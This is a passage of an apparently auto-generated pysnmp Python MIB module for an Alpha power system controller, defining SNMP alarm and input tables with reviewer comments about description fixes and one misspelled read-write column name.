dcPwrSysMiscAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmCount.setDescription('Number of misc alarm variables in system controller alarm table.')
dcPwrSysMiscAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2), )
if mibBuilder.loadTexts: dcPwrSysMiscAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmTable.setDescription('A table of DC power system controller misc alarm variables.')
dcPwrSysMiscAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysMiscAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysMiscAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmEntry.setDescription('An entry into the DC power system controller misc alarm group.')
dcPwrSysMiscAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table misc alarm group.')
dcPwrSysMiscAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller misc alarm group.')
dcPwrSysMiscAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller misc alarm group.')
dcPwrSysMiscAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller misc alarm group.')
dcPwrSysMiscAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMiscAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMiscAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller misc alarm group.')
# Control alarm group (group OID suffix 5.9).  Same layout as the other alarm
# groups: Count scalar at <g>.1, table at <g>.2 with Index / Name /
# IntegerValue / StringValue / Severity columns, all read-only.
dcPwrSysCtrlAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmCount.setDescription('The number of control alarm variables.')
dcPwrSysCtrlAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2), )
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmTable.setDescription('A table of control alarm variables.')
dcPwrSysCtrlAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCtrlAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmEntry.setDescription('An entry of the control alarm group')
dcPwrSysCtrlAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmIndex.setDescription('The index of the alarm variable in the control alarm group.')
dcPwrSysCtrlAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmName.setDescription('The description of the alarm variable as reported by the control alarm group.')
dcPwrSysCtrlAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the control alarm group.')
dcPwrSysCtrlAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmStringValue.setDescription('The string value of the alarm variable as reported by the control alarm group.')
dcPwrSysCtrlAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCtrlAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the control alarm group.')
# Adio alarm group (group OID suffix 5.10).  Same layout as the other alarm
# groups: Count scalar at <g>.1, table at <g>.2 with Index / Name /
# IntegerValue / StringValue / Severity columns, all read-only.
dcPwrSysAdioAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmCount.setStatus('current')
# Fixed copy-paste in the description text: this scalar counts Adio alarm
# variables, not "control" ones (compare the sibling groups' Count wording).
if mibBuilder.loadTexts: dcPwrSysAdioAlrmCount.setDescription('Number of Adio alarm variables in Adio alarm table.')
dcPwrSysAdioAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2), )
if mibBuilder.loadTexts: dcPwrSysAdioAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmTable.setDescription('A table of Adio alarm variables.')
dcPwrSysAdioAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysAdioAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysAdioAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmEntry.setDescription('An entry into the Adio alarm group.')
dcPwrSysAdioAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmIndex.setDescription('The index of the alarm variable in the table Adio alarm group.')
dcPwrSysAdioAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmName.setDescription('The description of the alarm variable as reported by the Adio alarm group.')
dcPwrSysAdioAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the Adio alarm group.')
dcPwrSysAdioAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAdioAlrmStringValue.setDescription('The string value of the alarm variable as reported by the Adio alarm group.')
dcPwrSysAdioAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAdioAlrmSeverity.setStatus('current')
# Fixed copy-paste: the severity column belongs to the Adio alarm group, not
# the control alarm group.
if mibBuilder.loadTexts: dcPwrSysAdioAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the Adio alarm group.')
# Converter alarm group (group OID suffix 5.11).  Same layout as the other
# alarm groups: Count scalar at <g>.1, table at <g>.2 with Index / Name /
# IntegerValue / StringValue / Severity columns, all read-only.
dcPwrSysConvAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmCount.setDescription('Number of Converter alarm variables in system controller alarm table.')
dcPwrSysConvAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2), )
if mibBuilder.loadTexts: dcPwrSysConvAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmTable.setDescription('A table of Converter alarm variables.')
dcPwrSysConvAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysConvAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysConvAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmEntry.setDescription('An entry into the Converter alarm group.')
dcPwrSysConvAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table Converter alarm group.')
dcPwrSysConvAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmName.setDescription('The description of the alarm variable as reported by the Converter alarm group.')
dcPwrSysConvAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the Converter alarm group.')
dcPwrSysConvAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmStringValue.setDescription('The string value of the alarm variable as reported by the Converter alarm group.')
dcPwrSysConvAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the Converter alarm group.')
# Inverter (Inv) alarm group (group OID suffix 5.12).  Same layout as the
# other alarm groups: Count scalar at <g>.1, table at <g>.2 with Index /
# Name / IntegerValue / StringValue / Severity columns, all read-only.
# The five column descriptions were empty strings in the generated output,
# inconsistent with every sibling group; they are filled in below using the
# same phrasing the sibling groups use.
dcPwrSysInvAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmCount.setDescription('Number of alarm variables in system controller alarm table')
dcPwrSysInvAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2), )
if mibBuilder.loadTexts: dcPwrSysInvAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmTable.setDescription('A table of power system controller Inv alarm variables')
dcPwrSysInvAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysInvAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysInvAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmEntry.setDescription('An entry into the power system controller Inv alarm group')
dcPwrSysInvAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmIndex.setDescription('The index of the alarm variable in the power system controller table Inv alarm group.')
dcPwrSysInvAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmName.setDescription('The description of the alarm variable as reported by the Inv alarm group.')
dcPwrSysInvAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the Inv alarm group.')
dcPwrSysInvAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmStringValue.setDescription('The string value of the alarm variable as reported by the Inv alarm group.')
dcPwrSysInvAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysInvAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysInvAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the Inv alarm group.')
# Input-variable groups (OID branch 1.3.6.1.4.1.7309.4.1.6.<g>).  Each group
# below follows one layout: a read-only Count scalar at <g>.1 and a table at
# <g>.2 of rows with Index / Name / IntegerValue / StringValue columns
# (no Severity column, unlike the alarm groups above).

# Digital input group (group OID suffix 6.1).
dcPwrSysDigIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpCount.setDescription('Number of digital input variables in system controller digital input table.')
dcPwrSysDigIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2), )
if mibBuilder.loadTexts: dcPwrSysDigIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpTable.setDescription('A table of digital input variables.')
dcPwrSysDigIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysDigIpIndex"))
if mibBuilder.loadTexts: dcPwrSysDigIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpEntry.setDescription('An entry into the digital input group.')
dcPwrSysDigIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpIndex.setDescription('The index of the digital input variable in the table digital input group.')
dcPwrSysDigIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpName.setDescription('The description of the digital input variable as reported by the digital input group.')
dcPwrSysDigIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpIntegerValue.setDescription('The integer value of the digital input variable as reported by the digital input group.')
dcPwrSysDigIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigIpStringValue.setDescription('The string value of the digital input variable as reported by the digital input group.')

# Controller input group (group OID suffix 6.2).
dcPwrSysCntrlrIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCntrlrIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpCount.setDescription('Number of controller input variables in system controller controller input table.')
dcPwrSysCntrlrIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2), )
if mibBuilder.loadTexts: dcPwrSysCntrlrIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpTable.setDescription('A table of controller input variables.')
dcPwrSysCntrlrIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCntrlrIpIndex"))
if mibBuilder.loadTexts: dcPwrSysCntrlrIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpEntry.setDescription('An entry into the controller input group.')
dcPwrSysCntrlrIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCntrlrIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpIndex.setDescription('The index of the controller input variable in the table controller input group.')
dcPwrSysCntrlrIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCntrlrIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpName.setDescription('The description of the controller input variable as reported by the controller input group.')
dcPwrSysCntrlrIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCntrlrIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpIntegerValue.setDescription('The integer value of the controller input variable as reported by the controller input group.')
dcPwrSysCntrlrIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCntrlrIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCntrlrIpStringValue.setDescription('The string value of the controller input variable as reported by the controller input group.')

# Rectifier input group (group OID suffix 6.3).
dcPwrSysRectIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpCount.setDescription('Number of rectifier input variables in system controller rectifier input table.')
dcPwrSysRectIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2), )
if mibBuilder.loadTexts: dcPwrSysRectIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpTable.setDescription('A table of rectifier input variables.')
dcPwrSysRectIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysRectIpIndex"))
if mibBuilder.loadTexts: dcPwrSysRectIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpEntry.setDescription('An entry into the rectifier input group.')
dcPwrSysRectIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpIndex.setDescription('The index of the rectifier input variable in the table rectifier input group.')
dcPwrSysRectIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpName.setDescription('The description of the rectifier input variable as reported by the rectifier input group.')
dcPwrSysRectIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpIntegerValue.setDescription('The integer value of the rectifier input variable as reported by the rectifier input group.')
dcPwrSysRectIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectIpStringValue.setDescription('The string value of the rectifier input variable as reported by the rectifier input group.')

# Custom input group (group OID suffix 6.4).
dcPwrSysCustomIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpCount.setDescription('Number of custom input variables in system controller custom input table.')
dcPwrSysCustomIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2), )
if mibBuilder.loadTexts: dcPwrSysCustomIpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpTable.setDescription('A table of digital custom variables.')
dcPwrSysCustomIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCustomIpIndex"))
if mibBuilder.loadTexts: dcPwrSysCustomIpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpEntry.setDescription('An entry into the custom input group.')
dcPwrSysCustomIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomIpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpIndex.setDescription('The index of the custom input variable in the table custom input group.')
dcPwrSysCustomIpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomIpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpName.setDescription('The description of the custom input variable as reported by the custom input group.')
# NOTE(review): this name carries a stray 'g' (dcPwrSysgCustomIpIntegerValue)
# and it is the only input column with max-access "readwrite" rather than
# "readonly".  Both presumably mirror the source MIB / generator output;
# renaming here would break this module's exportSymbols, so it is left as-is.
# Verify against the original AlphaPowerSystem-MIB definition.
dcPwrSysgCustomIpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: dcPwrSysgCustomIpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysgCustomIpIntegerValue.setDescription('The integer value of the custom input variable as reported by the custom input group.')
dcPwrSysCustomIpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomIpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomIpStringValue.setDescription('The string value of the custom input variable as reported by the custom input group.')
dcPwrSysConvIpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysConvIpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysConvIpCount.setDescription('Number of Converter input variables in system controller Converter input table.')
dcPwrSysConvIpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5, 2), )
if mibBuilder.loadTexts: dcPwrSysConvIpTable.setStatus('current')
